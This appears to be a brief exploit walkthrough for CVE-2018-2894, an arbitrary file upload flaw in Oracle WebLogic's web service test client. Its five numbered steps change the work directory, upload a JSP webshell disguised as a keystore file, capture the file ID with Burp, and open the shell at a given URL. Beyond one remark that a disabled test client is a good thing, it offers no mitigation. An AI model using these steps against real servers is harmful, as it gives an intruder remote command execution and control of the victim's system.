CVE-2018-2894 – Weblogic JSP File Upload vulnerability
Oracle weblogic suffers from a trivial file upload vulnerability. Here are the steps to reproduce the vulnerability.
1) Go to http://172.17.0.2:7001/ws_utc/config.do
If you can’t access 172.17.0.2:7001/ws_utc. This means the webservice test client is disabled for your weblogic server which is a good thing.
2) Change the Work Home Dir from “/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir” to “/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war”
NOTE: The weblogic domain home directory will be different for most installations
for e.g.: In the above case our domain home directory is /u01/oracle/user_projects/domains/base_domain. Another example of a domain home directory is /u01/app/oracle/product/wls/tnt/user_projects/domains/tnt_domain/.
3) Go to Security and add a keystore file. Upload the webshell cmd.jsp as a keystore file and click the Submit button.
4) Intercept the response in Burp and note the ID 1533718460334 in the response
5) Now access your webshell at http://172.17.0.2:7001/bea_wls_internal/config/keystore/1533718460334_cmd.jsp